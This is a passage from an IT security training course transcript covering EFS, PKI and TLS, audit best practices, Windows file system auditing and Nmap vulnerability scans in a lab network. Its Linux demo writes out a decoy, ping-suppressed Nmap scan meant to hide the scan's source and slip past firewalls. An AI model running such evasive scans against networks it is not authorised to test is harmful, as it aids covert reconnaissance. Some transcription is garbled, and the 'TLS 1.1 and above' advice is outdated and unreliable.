can do Cipher /e for encrypt, and then specify what it is it that needs to be
encrypted, such as a file name. And, inversely, we can decrypt using Cipher /d. The
thing to watch out for though is if you're going to do this across a bunch of
machines, understand that EFS encryption encrypts the file for the user that is
logged on doing the encryption.
So, you can add other parodies that should have the ability to decrypt, but this is the
default behavior, so just bare it in mind. The next thing we'll do is distinguish the
difference, and the relationship also, between PKI, SSL, and TLS. PKI, or public
key infrastructure, really is a hierarchy of digital security certificates, that are
issued to users, devices or even software applications. And among other things the
certificate, it's used for security, but it contains a public key, and possibly a
mathematically related private key. And these are used for encryption and
decryption and the creation of digital signatures, and all that great stuff that secures
a connection over the network.
Now SSL is a security protocol. So when people say SSL certificate, well, it’s
almost like a misnomer. A PKI certificate can be used for SSL or TLS or both at
the same time. So we don't really want to call it, technically, an SSL or a TLS
certificate, SSL is a security protocol. However, it's considered vulnerable and
deprecated, so we should try not to use it if we don't have to. TLS, or Transport
Layer Security, can be used. It supersedes SSL. Now you don't want to use TLS
1.0, because there are known vulnerabilities. If you can help it, don't use it. But try
to use version 1.1 and above. Again, TLS is a security protocol where, for example,
a web browser connecting to a server will negotiate the highest level of TLS that is
supported by both ends to deal with key exchange and so on.
Cybersecurity 101: Auditing & Incident
Response
This 12-video course explores selective auditing, which provides valuable insights
to activity on a network, and incident response plans, which are proactive measures
used to deal with negative events. Key concepts covered here include best practices
related to IT security auditing and their benefits, including assurance that IT
systems, business processes, and data are protected properly and that privileges are
not being abused; and how to use Group Policy to enable file system auditing.
Continue by observing how to scan hosts for security weaknesses from Windows
and how to scan hosts for security weaknesses from Linux; and learning the
importance of securing mobile devices. Next, you will learn how to centrally apply
security settings to mobile devices; how to configure Amazon Web Services to use
multifactor authentication; and examine how security is applied to applications
from design to use. Learn how to use file hashing to detect modifications; how to
specify actions used when dealing with security incidents; and learn to view a
packet capture to identify suspicious activity centrally apply security settings.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Dan Lachance, an IT Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993. Including as a technical
trainer with Global Knowledge, programmer consultant, as well as an IT tech
author and editor for McGraw-Hill and Wiley publishing. He has held and still
holds certifications in Linux, Novell, Lotus, CompTIA, and Microsoft. His
specialities over the years have included networking, IT security, cloud solutions,
Linux management, and configuration and troubleshooting across a wide array of
Microsoft products. Most end users have a general sense of IT security concepts.
But today's IT systems are growing ever larger and more complex. So now more
than ever, it's imperative to have a clear understanding of what digital assets are
and how to deal with security threats and vulnerabilities. Users need to acquire the
skills and knowledge to apply security mitigations at the organizational level. In
this course, Dan Lachance will use selective auditing to provide valuable insights to
activity on a network. He'll also cover how incident response plans are proactive
measures used to deal with negative events. Specifically, learners will explore how
to apply IT security skills to enable asset usage auditing and create incidence
response plans.
Security Auditing and Accountability
[Video description begins] Topic title: Security Auditing and Accountability. The
presenter is Dan Lachance. [Video description ends]
Periodic security audits can ensure that IT systems, business processes, and data are
protected properly and that privileges are not being abused.
[Video description begins] Security Auditing [Video description ends]
So we can track resource usage, where resources could be things like files,
databases, applications, secured devices, user accounts, and even changes made to
privileges for access to these resources. There are usually a number of driving
factors that will push an organization to conducting periodic security audits.
[Video description begins] Audit Driving Factors [Video description ends]
One of which is legal and regulatory compliance. For example, to remain in
compliance with HIPAA regulations related to protection of sensitive medical
information, certain types of security controls need to be in place. And this can be
determined through conducting periodic security audits. And the same thing would
be true for other bodies like PCI DSS, which is used for merchants that work with
cardholder data, the proper protection of that type of sensitive information.
Another driving factor would be to ensure continued customer confidence in the
organization. We should also establish an annual security baseline because if we
don't do that when we periodically conduct a security audit, we might not know
what is secure or what is not, compared to what is normal within the specific
organization. Also, we can use auditing to measure incident response effectiveness
as we audit how incidents are dealt with.
[Video description begins] Auditing Best Practices [Video description ends]
Some best practices relating to auditing begin with understanding that the unique
organization has specific business and security needs that will be different from
other organizations. And so as a result, the security policies will be unique. We
should only audit security principles of interest. A security principle is a user or a
group, or a device, or a piece of software. We don't want to enable, for example,
access to every file on every file server for every user. We want to be a little bit
more specific than that. We also want to audit only relevant events, such as the
success of accessing a restricted database, or perhaps only auditing the failure of an
attempt to access a secure database.
So what we're talking about doing here is avoiding audit message fatigue. If you
audit too much, you'll be receiving too many audit message alerts and then it begins
to lose its meaning. We should also make sure that audit logs that retain audit
events themselves are protected. They should have auditing and access control
mechanisms applied. They should also be encrypted. We should store an additional
copy of audit logs away from the device that itself, is being audited, in case it gets
compromised. We should always ensure users have a unique log on account
because if we don't, then we don't have a way for users to be accountable for the
use of that account. And auditing always requires continuous centralized
monitoring because we want to make sure that over time, our security processes
and controls are still effective.
Auditing also includes conducting periodic scans, such as vulnerability scanning of
either a host or a network to identify weaknesses, such as ports that are open that
shouldn't be or missing software patches. Penetration testing is a little bit different
because instead of simply identifying vulnerabilities there is an attempt to exploit
those vulnerabilities. And this is done so that we can determine the security posture
of an organization. But the think about penetration testing is it's not passive like
vulnerability scanning. It can actually render systems unstable or even unusable if a
vulnerability is successfully exploited by the pen testing team.
So we have to make sure ahead of time, that when a pen test is going to be
conducted against an organization, that there are specific times of day that are set
aside for this. And that non-disclosure agreements or NDAs are also signed by the
pen testers because they might gain access to very sensitive information as they run
penetration tests. We should also determine whether an internal versus an external
security auditing team should be used. To remain compliant with some regulations,
it might require that we have a third party or a set of external auditors conducting
the audit. There are a few types of security audits that can be conducted by security
IT teams, one of which is the Black Box test.
[Video description begins] Types of Security Audits [Video description ends]
This means that no implementation details are provided to the pen test team. And
so therefore, only public data is available to them to determine which systems are
in use, which versions, and how it's been implemented. So this is really the best
gauge of real attacks from the outside, when attackers would have no access to
internal information. Another type of audit or test is a White Box test, where
internal implementation details are provided. So this is the same type of knowledge
that employees might have. And we all know that sometimes, security breaches are
the result of insider jobs. So it's also important to conduct this type of test
periodically as well.
And certainly, it would be more thorough than a Black Box text because of the
amount of knowledge that would be available to the pen testers. Knowledge of
internal systems and processes, even software development and code review
practices used by the specific organization. Finally, we've also got Grey Box testing
where only some implementation details are provided to the pen test team. It could
be things like network documentation or organizational security policies, maybe
only a subset of those policies. So this is a good representation then of what social
engineering attackers might know by trying to trick users to divulge some
information.
Enable Windows File System Auditing
[Video description begins] Topic title: Enable Windows File System Auditing. The
presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll use Windows Server 2016 to enable Windows File
System Auditing. File System Auditing allows us to track access to a given file.
Whether the people are opening the file, or attempting to open the file, or
attempting to delete it and so on. To get started here on my server, I'm going to go
to my Start menu and fire up the Active Directory Users and Computers tool. This
server is an Active Directory domain controller. And so we're going to take a quick
peek at any user accounts that might be available or security principals that we
want to audit.
[Video description begins] The Active Directory Users and Computers window
opens. It is divided into four parts. The first part is the menu bar. The second part
is the toolbar. The third part is the Active Directory Users and Computers pane. It
contains the Saved Queries and fakedomain1.local root nodes. The
fakedomain1.local root node includes the LasVegas subnode, which further
contains the Computers, Groups, and Users subnodes. The Users subnode is
selected. The fourth part is the content pane. It contains a table. This table has the
column headers: Name, Type, and Description. The Name column header has the
value, User One. The Type column header has the value, User. The Description
column has no value. [Video description ends]
Here I've got a user called User One so that is the account I'm going to audit access
to a specific file in the file system.
[Video description begins] He selects the User One value in the Name column
header. [Video description ends]
Here in the file system on that same server, although it doesn't have to be the same
server, it could be just another server joined to the domain.
[Video description begins] He opens the File Explorer window. It is divided into
four parts. The first part is the menu bar. The second part includes the address bar.
The third part displays a list of drives and folders. The fourth part displays the
contents of the drive or folder selected in the third part. The Local Disk (C:) drive
is selected in the third part. The fourth part includes the Projects folder. [Video
description ends]
But I've got a file location here on Drive C called Projects. It's a folder in which
there are three sample files.
[Video description begins] He opens the Projects folder given in the fourth part. It
contains three files, named Project_A.txt, Project_B.txt, and Project_C.txt. [Video
description ends]
What I want to do is enable auditing of user one's access to the Projects folder here
on the server.
[Video description begins] He switches back to the list of contents displayed in the
fourth part. He closes the File Explorer window. [Video description ends]
The first thing we need to do is to turn on the option for auditing file systems. And
that is done through group policies. So on my server, I'll fire up my menu and go
into the Group Policy Management tool.
[Video description begins] The Group Policy Management window opens. It is
divided into four parts. The first part is the menu bar. The second part is the
toolbar. The third part contains the Group Policy Management root node. It
contains the Forest: fakedomain1.local subnode. It includes the Domains subnode.
This subnode contains the fakedomain1.local subnode, which further includes the
Default Domain Policy, Admins, Boston, and LasVegas subnodes. The Default
Domain Policy subnode is selected. The fourth part contains the Default Domain
Policy page. It contains the Scope, Details, Settings, and Delegation tabs and three
sections. The first section is Links. The second section is Security Filtering. The
third section is WMI Filtering. [Video description ends]
I want this applied at the entire Active Directory domain level. So I'm going to go
ahead and right-click Default Domain Policy, that is there automatically, and I'll
choose Edit.
[Video description begins] The Group Policy Management Editor window opens. It
is divided into four parts. The first part is the menu bar. The second part is the
toolbar. The third part includes the Computer Configuration and User
Configuration root nodes. The Computer Configuration root node contains the
Policies and Preferences subnodes. The User Configuration root node also
contains the Policies and Preferences subnodes. The fourth part displays the
information of the selected node in the third part. [Video description ends]
Now because auditing is a security item we're going to find that most security items
in group policy exist under Computer Configuration and not under User
Configuration. So under Computer Configuration, I'm going to go ahead and
expand Policies. Then I need to drill down under Windows Settings and then
Security Settings. And then finally, I've got my audit policy information listed
down at the bottom.
[Video description begins] He expands the Policies subnode. This subnode includes
the Windows Settings subnode. He expands this subnode. It includes the Security
Settings subnode. He expands this subnode. It includes the Advanced Audit Policy
Configuration subnode. He expands this subnode. It contains the Audit Policies
subnode. He expands this subnode. It includes the Object Access subnode. He
selects this subnode. The fourth part displays a table with the column headers:
Subcategory and Audit Events. [Video description ends]
So I'm going to expand Audit Policies > Object Access.
[Video description begins] He highlights the row entry: Subcategory: Audit File
System and Audit Events: Not Configured. [Video description ends]
Then on the right, I can see I have the ability to audit the file system as well as the
file shares, shared folders.
[Video description begins] He highlights the row entry: Subcategory: Audit File
Share and Audit Events: Not Configured. [Video description ends]
But I'm interested in the file system. I'm going to double-click on that and I'm going
to turn on the check mark to configure audit events for both success and failure.
[Video description begins] The Audit File System Properties dialog box opens. It
includes the Policy tab and the OK button. The Policy tab includes the Configure
the following audit events: checkbox. The Success and Failure checkboxes are
given below this checkbox. These are disabled. [Video description ends]
Maybe you want to audit when people successfully open project files or maybe you
only want to audit when people try to, but it fails, or maybe both as in my case.
[Video description begins] He selects the Configure the following audit events:
checkbox. The Success and Failure checkboxes get enabled. He selects these
checkboxes. [Video description ends]
I've turned those on, this is like the master switch.
[Video description begins] He clicks the OK button and the Audit File System
Properties dialog box closes. [Video description ends]
The next thing I need to do is to go back into the file system to configure auditing
further. So here is the Projects folder that we were talking about.
[Video description begins] He switches to the File Explorer window. [Video
description ends]
So I've turned on the overall potential for auditing. But I'm not yet auditing the
Projects folder. To do that I need to right-click on that folder. The same step would
apply to an individual file that you want to audit too. I've right-clicked on the
folder, I'm going to go into the Properties, going to go under Security.
[Video description begins] The Project Properties dialog box opens. It includes the
Security tab. [Video description ends]
Then I'll click the Advanced button and then I'll click the Auditing tab.
[Video description begins] The Advanced Security Settings for Projects window
opens. It includes the Auditing tab. [Video description ends]
We can see down below currently, nobody is being audited at least for this folder
Projects.
[Video description begins] He clicks the Auditing tab. It displays a table with the
column headers: Type, Principal, Access, Inherited from, and Applies to and the
Add button. These column headers are empty. [Video description ends]
So I'm going to click Add.
[Video description begins] The Auditing Entry for Projects window opens. It
includes the Select a principal link, Type and Applies to drop-down list boxes, the
Full control, Modify, Read & execute, List folder contents, Read, Write, and
Special permissions checkboxes, and the OK button. The Type and Applies to dropdown list boxes and the Full control, Modify, Read & execute, List folder contents,
Read, Write, and Special permissions checkboxes are disabled. The Read &
execute, List folder contents, and Read checkboxes are selected. [Video description
ends]
And I'm going to click Select a principal, which in this case is going to be my user
uone, user one.
[Video description begins] The Select User, Computer, Service Account, or Group
dialog box opens. It includes the Enter the object name to select (examples): text
box and the Check Names button. This button is disabled. [Video description ends]
Now we could also specify a group and so on. I can determine if I want to audit the
success or failure or all types of events.
[Video description begins] He types uone in the Enter the object name to select
(examples): text box. The Check Names button gets enabled. He clicks this button.
The uone text changes to User One (UOne@fakedomain1.local). He then clicks the
OK button, and the dialog box closes. The Type and Applies to drop-down list
boxes and the Full control, Modify, Read & execute, List folder contents, Read, and
Write checkboxes get enabled. [Video description ends]
Well, let's say in this case, I'm going to choose All.
[Video description begins] He selects the All value in the Type drop-down list
box. [Video description ends]
And I don't care if it applies to the folder, subfolders or files within it, but I want to
start in the file system hierarchy at the Projects folder. And maybe I'm interested in
checking out the use of Read & execute, List folder contents, Read, and also let's
say maybe even Write.
[Video description begins] He selects the Write checkbox. [Video description ends]
So I've got this now set up, I'm going to click OK. There is my user principal that
I'm auditing for the Projects folder UOne.
[Video description begins] The column headers: Type, Principal, Access, Inherited
from, and Applies to, in the Advanced Security Settings for Projects window get
populated with the All, User One (UOne@fakedomain1.local), Read, write &
execute, None, and This folder, subfolders and files values, respectively. [Video
description ends]
I'll just click OK, and OK.
[Video description begins] The Advanced Security Settings for Projects window
closes. [Video description ends]
So to test this I'm going to connect as user one to the Projects folder and try to
access something because that should trigger events to be written to this server's
security log.
[Video description begins] The Projects Properties dialog box closes. [Video
description ends]
Before I test this I'm just going to share out this Projects folder on the network.
[Video description begins] He right-clicks the Projects folder and selects the
Properties option. The Projects Properties dialog box opens. [Video description
ends]
So I'm going to right-click, go into the Properties, go into Sharing and I'll click
Advanced Sharing.
[Video description begins] He clicks the Sharing tab. It includes the Advanced
Sharing button. [Video description ends]
I want to share the folder as Projects.
[Video description begins] He clicks the Advanced Sharing button. The Advanced
Sharing dialog box opens. It includes the Share this folder checkbox and the
Permissions and OK buttons. The Share this folder checkbox is selected. [Video
description ends]
And for the permissions, if I click Permissions, we can see everyone has got at least
Read, so I'll just add Read and Change.
[Video description begins] He hovers over the Share this folder checkbox. [Video
description ends]
And of course I can also specify further permissions or less permissions for specific
files in that folder.
[Video description begins] The Permissions for Projects dialog box opens. It
includes a table with the column headers: Permissions for Everyone, Allow, and
Deny. The Permissions for Everyone column header has the values: Full Control,
Change, and Read. The Allow and Deny column headers have three checkboxes.
The checkbox in the Allow column header for the Read value in the Permissions for
Everyone column header is selected. [Video description ends]
For example, if I look at the Project_A.txt file and go into Properties.
[Video description begins] He selects the checkbox in the Allow column header for
the Change value in the Permissions for Everyone column header. [Video
description ends]
I could go into Security for it and determine the permissions that are assigned at the
individual NTFS file level.
[Video description begins] He closes the Permissions for Projects dialog
box. [Video description ends]
And remember that when you combine sharing folder permissions, the most
restrictive applies.
[Video description begins] He closes the Projects Properties dialog box and opens
the Projects folder. [Video description ends]
From a Windows 10 station, I'm going try to connect to the UNC path of that host,
double backslash.
[Video description begins] The Project_A.txt Properties dialog box opens. It
includes the Security tab and the Cancel button. [Video description ends]
I know the IP address and I know that the folder here is called Projects.
[Video description begins] He clicks the Security tab. It includes the Group or user
names list box and a table. The Group or user names: text box includes the Users
(FAKEDOMAIN1\Users) value. He selects this value. The table shows the column
headers: Permissions for Users, Allow, and Deny. The Permissions for Users
column header has the values: Full Control, Modify, Read & Execute, Read, Write,
and Special permissions. The Allow column has two tick marks for the Read &
Execute and Read values in the Permissions for Users column header. The Deny
column has no value. [Video description ends]
So I'm being prompted to authenticate.
[Video description begins] He hovers over the tick marks. [Video description ends]
So the domain is fakedomain1\, the user name is uone and I'll pop in the password
for that account.
[Video description begins] He clicks the Cancel button and the Project_A.txt
Properties dialog box closes. [Video description ends]
Now we can see those files.
[Video description begins] He opens another File Explorer window. [Video
description ends]
So I'm going to go ahead and try to open up Project_A.txt.
[Video description begins] He types \\192.168.0.231\projects in the address bar
and presses the Enter key. The Windows Security dialog box opens. It includes the
User name and Password text boxes and the OK button. He types
fakedomain1\uone in the User name text box and password in the Password text
box. He then clicks the OK button to close the dialog box. [Video description ends]
And we can see indeed that the Project_A.txt file, which only contains sample text
has actually been opened up.
[Video description begins] He switches back to the previous File Explorer window.
He opens the Project_A.txt file. [Video description ends]
So we've gone ahead and accessed that file. Now bear in mind, in order for this to
trigger the audit event to be written to the security log of the server, group policy
needs to have been refreshed on affected machines, such as on the server that we
are auditing. That refresh should happen automatically on the server.
[Video description begins] He switches back to the File Explorer window. [Video
description ends]
But if you're actually testing this and it's not working, and you've done the
configuration very quickly, you might want to go into a Command Prompt on the
server and then force a Group Policy refresh such as gpupdate /force.
[Video description begins] He clicks the Start menu and types cmd. The Command
Prompt option appears. He selects this option. The Administrator: Command
Prompt window opens. The C:\Users\Administrator> prompt is displayed. [Video
description ends]
And if you see messages like Computer Policy update has completed successfully,
User Policy update has completely successfully, you know you're good on the
server that you've configured to audit.
[Video description begins] He executes the gpupdate /force command. The
C:\Users\Administrator> prompt is displayed. [Video description ends]
Because the computer policy, as you recall, when we were configuring it, is where
we drilled down into the security section to configure the auditing. So on the server
that has the file system that I'm auditing, I'm going to go ahead and take a look at
the Event Viewer. So, from the Start menu, I'll type then, and I'll go into the Event
Viewer.
[Video description begins] He clicks the Start menu and types eve. The Event
Viewer option appears. He selects this option. The Event Viewer window opens. It
is divided into five parts. The first part is the menu bar. The second part is the
toolbar. The third part is the Event Viewer (Local) pane. It includes the Custom
Views and Windows Logs root nodes. The fourth part is the content pane. It
displays the information of the node selected in the Event Viewer (Local) pane. The
fifth part is the Actions pane. [Video description ends]
What I want to do is drill down on the left under Windows Logs and Security Log.
[Video description begins] He expands the Windows Logs root node. It includes the
Security option. [Video description ends]
That is where auditing events get written.
[Video description begins] He selects the Security option. The Security page opens
in the content pane. It is divided into two parts. The first part includes a table with
the column headers: Keywords, Date and Time, Source, Event ID, and Task
Category. The second part includes the General tab. [Video description ends]
And over on the right, I can either search or I can see I've got an audit message
listed here for FAKEDOMAIN1\UOne.
[Video description begins] He selects the row entry: Keywords: Audit Success,
Date and Time: 1/8/2019 10:14:29 AM, Source: Microsoft Windows security, Event
ID: 4656, and Task Category: File System. The General tab includes Security ID:
FAKEDOMAIN1\UOne and Object Name: C:\Projects\Project_A.txt. [Video
description ends]
And see what else it says.
[Video description begins] He highlights UOne in Security ID:
FAKEDOMAIN1\UOne. [Video description ends]
And it looks like that user read a file here called Project A.txt.
[Video description begins] He highlights Project_A.txt in the Object Name:
C:\Projects\Project_A.txt. [Video description ends]
And of course, we can see the date and time stamp that goes along with that audit
event.
Conduct a Vulnerability Assessment Using Windows
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using
Windows. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Windows 10
station. The problem is that Windows 10 does not include a vulnerability scanner
by default within the operating system. But that is okay because we can go and
download the free Nmap tool which I've already done. So I'm going to go to my
Start menu, type in nmap and there it is the Zenmap tool with the front end GUI
which is part of Nmap.
[Video description begins] The Zenmap window opens. It is divided into four parts.
The first part is the menu bar. The second part contains the Target combo box, the
Profile drop-down list box, Command text box, and the Scan and Cancel buttons.
The Intense scan value is selected in the Profile drop-down list box. The Command
text box has the command, nmap -T4 -A -v. The third part contains the Hosts and
Services buttons and the OS and Host column headers. The fourth part contains the
Nmap Output, Ports / Hosts, Topology, Host Details, and Scans tabs. The Nmap
Output tab is selected. It displays a drop-down list box and the Details button.
These are disabled. [Video description ends]
I'm going to go ahead and click on that, and the first thing I have to do is determine
what the target is. Am I trying to scan a single host for vulnerabilities or subset of
hosts or the entire subnet? In this case, I'm going to put in 192.168.0 which is my
network and then 0.1-254. I want to scan all host IP addresses on the 192.168.0
subnet.
[Video description begins] He types 192.168.0.1-254 in the Target combo box. The
command in the Command text box changes to nmap -T4 -A -v 192.168.0.1254. [Video description ends]
Then I have to determine the scanning profile I'm going to use. Do I want to
perform an intense scan which would take longer than a quick scan?
[Video description begins] He clicks the Profile drop-down list box. A list of
options appears. It includes the Quick scan option. [Video description ends]
And notice when I choose a different profile it's going to be modifying the Nmap
command that is going to be executed.
[Video description begins] He hovers over the nmap -T4 -A -v 192.168.0.1-254
command in the Command text box. [Video description ends]
So if I choose Quick scan, it's changed ever so slightly.
[Video description begins] He selects the Quick Scan option. The nmap -T4 -A -v
192.168.0.1-254 command in the Command text box changes to nmap -T4 -F
192.168.0.1-254. [Video description ends]
And if you are familiar with Nmap command line syntax already, then you can go
ahead and pop it in here. And it will take it as you execute or run the scan, which
we do by clicking the Scan button in the upper-right, which I'll do now.
[Video description begins] He clicks the Scan button. The output appears in the
Nmap Output tab. The Host column header includes the hosts: 192.168.0.1,
192.168.0.2, 192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.7. The output
displays the details of each host in a separate section. [Video description ends]
And after a moment, in the left-hand navigator, we can see it's discovered a number
of hosts that are up and running up on the subnet.
[Video description begins] He selects the 192.168.0.2, 192.168.0.3, 192.168.0.5,
192.168.0.6, and 192.168.0.7 hosts. [Video description ends]
On the right, we can also see the Nmap Output where each host is separated with a
blank line.
[Video description begins] He highlights 192.168.0.1 in the output line: Nmap scan
report for 192.168.0.1. [Video description ends]
We've got sections for each host where to list things like the IP address of the host,
port information, which is whether the port is open and listening.
[Video description begins] He highlights the entries of the table displayed in the
details of 192.168.0.1 in the output. This table has three column headers: PORT,
STATE, and SERVICE. The entries in the first row are: 53/tcp, open, and domain,
respectively. The entries in the second row are: 80/tcp, open, and http, respectively.
The entries in the third row are: 443/tcp, open, and https, respectively. The entries
in the fourth row are: 5000/tcp, open, and upnp, respectively. [Video description
ends]
Or whether it's filtered which normally means that it's being blocked by a firewall
rule.
[Video description begins] He highlights filtered in the output line: 8081/tcp
filtered blackice-icecap. [Video description ends]
We can also see the hardware or the MAC Address of the device and on the left, I
can also click on Services and view things from this perspective.
[Video description begins] He highlights 2C:99:24:5A:17:C0 in the output line:
MAC Address: 2C:99:24:5A:17:C0 (Arris Group). [Video description ends]
For example, I want to see all the jetdirect network printers out there.
[Video description begins] He clicks the Service button. The Service pane opens. It
includes the afp, blackice-icecap, dc, domain, http, http-proxy, https, ida-agent,
jetdirect, and microsoft-ds. [Video description ends]
So I can click jetdirect and I can see the IP here listing on TCP Port 9100 which is
normal for network printing.
[Video description begins] He clicks the jetdirect service. The Port / Hosts tab in
the fourth part shows a table with the column headers: Hostname, Port, Protocol,
State, and Version. The Hostname column header has the value, 192.168.0.5. The
Port column header has the value, 9100. The Protocol column header has the
value, tcp. The State column header has the value, open. The Version column
header has no value. [Video description ends]
And maybe I want to look for web servers so I could click on http.
[Video description begins] He clicks the http service. The Port / Hosts tab in the
fourth part shows a table with the column headers: Hostname, Port, Protocol,
State, and Version. The Hostname column header has the values, 192.168.0.1,
192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.13. The Port column header
has the value, 80, for each row. The Protocol column header has the value, tcp, for
each row. The State column header has the value, open, for each row. The Version
column header has no value. [Video description ends]
Maybe there is only supposed to be one on the network, but here I see five listed.
And this is one of the reasons we conduct vulnerability scans, so that we can
identify weaknesses and harden our network environment.
[Video description begins] He hovers over the Hostname column header
values. [Video description ends]
The bad guys would use the same type of tool and techniques to perform
reconnaissance, to find weaknesses that they can exploit. So we want to make sure
we get to it before they do. We can also click the Topology tab here.
[Video description begins] The Topology tab displays three buttons, named Hosts
Viewer, Fisheye, and Controls and the diagram of the hosts found on the network.
The diagram shows the connections between the hosts on the network. The different
hosts on the network are 192.168.0.2, 192.168.0.20, 192.168.0.13, 192.168.0.252,
192.168.0.11, 192.168.0.9, 192.168.0.8, 192.168.0.5, 192.168.0.12, 192.168.0.7,
192.168.0.6, and 192.168.0.1. [Video description ends]
Now, I can't really see the devices here that it's found on my network. If I click
Fisheye, it spreads them out a little bit.
[Video description begins] The list of controls includes the Zoom control. [Video
description ends]
But I can also click on Controls, which shows me a list of controls over in the righthand side of the screen. And one of the things I can do is actually zoom in.
[Video description begins] He zooms in the diagram using the Zoom
control. [Video description ends]
Now when I've done that, notice that I have got circles for each detected host and
they are different colors. Some are green, some are yellow, some are red. The idea
is that green means that it has less than three open ports that were discovered. But if
it's got between three and six open ports, it'll be yellow and red is not good because
it's got more than six open ports. And of course, the larger the circle, the more open
ports that were discovered. The little padlock means that there are some filtered
ports on that device normally due to firewall settings on a host-based firewall.
[Video description begins] He clicks the Host Details tab. It does not display
anything. [Video description ends]
We can also click Host Details over here to view specific host details, which we
could also trigger from the Topology.
[Video description begins] He clicks the Topology tab. He then clicks the Hosts
Viewer button. The Hosts Viewer window opens. It is divided into two parts. The
first part is the Hosts pane. It displays a list of hosts, which includes 192.168.0.6.
The second part contains the General, Services, and Traceroute tabs. The General
tab is selected. It contains three expandable sections, named General information,
Operating System, and Sequences. The General information section is expanded. It
contains the Address and Hostname drop-down list boxes. [Video description ends]
Actually, I'll do it from here, because if I click Host Viewer, I get a list of the
hosts.
[Video description begins] He hovers over the list of hosts in the Hosts
pane. [Video description ends]
Again, we now know what the color coding means, and so I could click on one of
them.
[Video description begins] He clicks the 192.168.0.6 host. The Address drop-down
list box shows the value, [ipv4] 192.168.0.6. The Hostname drop-down list box
does not show any value. [Video description ends]
We haven't done an intense scan, so we don't see any operating system info.
[Video description begins] He expands the Operating System expandable section. It
shows the message: No OS information. [Video description ends]
But if we go to Services, we'll see port information.
[Video description begins] He clicks the Services tab. It contains three tabs: Ports
(2), Extraports (98), and Special fields. The Ports (2) tab is selected by default. It
displays a table with five column headers: Port, Protocol, State, Service, and
Method. The Port column header has the values, 22 and 80. The Protocol column
header has the value, tcp, for all the rows. The State column header has the value,
open, for all the rows. The Service column header has the values, ssh and http. The
Method column header has the value, table, for all the rows. [Video description
ends]
And of course, if we've got three or fewer open ports, then that is when we have a
device or a host that will show up with a green color listed here.
[Video description begins] He closes the Hosts Viewer window. [Video description
ends]
We can also see any past scans, here is our current scan that is currently got a status
of Unsaved.
[Video description begins] He clicks the Scans tab. It shows two column headers:
Status and Command. The Status column header has the value, Unsaved. The
Command column header has the value, nmap -T4 -F 192.168.0.1-254. [Video
description ends]
So we can go to the scan menu and we can save the scan as an XML document.
[Video description begins] He clicks Save Scan in the Scan menu. The Save Scan
dialog box opens. It includes the Name text box, Select File Type drop-down list
box, and the Cancel and Save buttons. The Name text box contains the value, .xml.
The Select File Type drop-down list box shows the value, Nmap XML format
(.xml). [Video description ends]
So that we could perhaps establish a baseline of what is normal and what should be
on the network.
[Video description begins] He clicks the Cancel button, and the Save Scan dialog
box closes. [Video description ends]
And what is cool is that we can also go to the Tools menu and compare to scans to
see what is changed over time such as the presence of a new machine on the
network perhaps that shouldn't be there.
[Video description begins] He clicks Compare Results in the Tools menu. The
Compare Results window opens. It contains two sections, A Scan and B Scan. Both
these sections includes a drop-down list box and the Open button. [Video
description ends]
So this is a pretty easy tool to use.
[Video description begins] He closes the Compare Results window. [Video
description ends]
And it's one of those things that we should run on a periodic basis to make sure we
know what is on the network and whether or not we've got too many
vulnerabilities.
Conduct a Vulnerability Assessment Using Linux
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using
Linux. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Linux
station. I'm using Kali Linux, which is a Linux distribution that contains many
security tools including Nmap, which we can use to conduct a vulnerability scan.
[Video description begins] The root@kali: ~ command line window is open. The
root@kali:~# prompt is displayed. [Video description ends]
Here from the command line on Kali Linux, I'm going to run Nmap. And I'm just
going to give it a single IP address so that I can scan just a single post.
[Video description begins] He executes the command: nmap 192.168.0.1. The
scanning for 192.168.0.1 gets completed and the report is displayed in the output.
The prompt does not change. [Video description ends]
After a moment, we can see the scan is completed for, in this case, 192.168.0.1.
And we can see a number of ports that are listed as being open, such as TCP 53 for
DNS, transfer between DNS servers, port 80 and 443 for http and https respectively
[Video description begins] He highlights the table entries displayed in the output.
The table has three column headers: PORT, STATE, and SERVICE. The PORT
column header has the values: 53/tcp, 80/tcp, 443/tcp, and 5000/tcp. The STATE
column header has the value, open, for all the rows. The SERVICE column header
has the values: domain, http, https, and upnp. [Video description ends]
. TCP port 5000 for upnp. That is when you probably want to close where you can
control it unless you absolutely need universal plug and play running. And then I
might also have some filtered ports which normally means a firewall is configured
to prevent that from being accessed. And there I can also see the MAC Address.
[Video description begins] He highlights filtered in the output lines: 8081/tcp
filtered blackice-icecap 8082/tcp filtered blackice-alerts. [Video description ends]
I'm going to clear the screen.
[Video description begins] The MAC address is 2C:99:24:5A:17:C0
(unknown). [Video description ends]
Because here from the Nmap command line what I also want to do is scan the
network and perform a few extra things.
[Video description begins] He executes the command: clear. The prompt does not
change. [Video description ends]
So I'm going run nmap. And I'm going to do 192.168.0. Now, I could either put 1254 here or to scan the entire subnet, I could also put 0 and then the subnet mask,
the number of bits. This is side or notation. It's a /24, so 24 bit subnet mask. In
other words, 255.255.255.0, which really means this is my network address,
192.168.0. So I'm going to scan the subnet. I'm going to scan for port 80, -p80.
Now remember in Linux, lower and uppercase have different meanings. So make
sure you're careful about that. And I'm going to use the -D parameter decoy.
What this will let me do is specify a couple of other IP addresses that this scan will
look like it originated from. So I'm just going to put in a couple of other random
IPs, doesn't matter which subnet that they're on or anything like that. And in
addition to my own IP, this is what it's going to look like the scan is coming from
as the scan is executing. So this is something that attackers would do when they're
performing reconnaissance.
And you'll find that if you want to perform an Nmap scan from outside of a
firewall, that might be blocking ICMP traffic and commands like ping and trace
root use ICMP, you might want to also pass a -P0 here. And what this really means
is it tells Nmap to not send out initial ping messages like it normally does by
default. And this way the scan has a better chance of being able to get through
firewalls that might block ICMP type of ping traffic. So I'm going to go ahead and
press Enter to begin this scan.
[Video description begins] He executes the command: nmap 192.168.0.0/24 -p80 D 1.1.1.1,1.1.1.3,192.168.0.46 -P0. The output displays the nmap scan report for
192.168.0.12, 192.168.0.13, 192.168.0.252, and 192.168.0.20. The prompt does not
change. [Video description ends]
And we can now see that the scan has completed. So we can see the Nmap scan
report for specific ports on a given MAC address and IP address.
[Video description begins] He highlights the output lines: Nmap scan report for
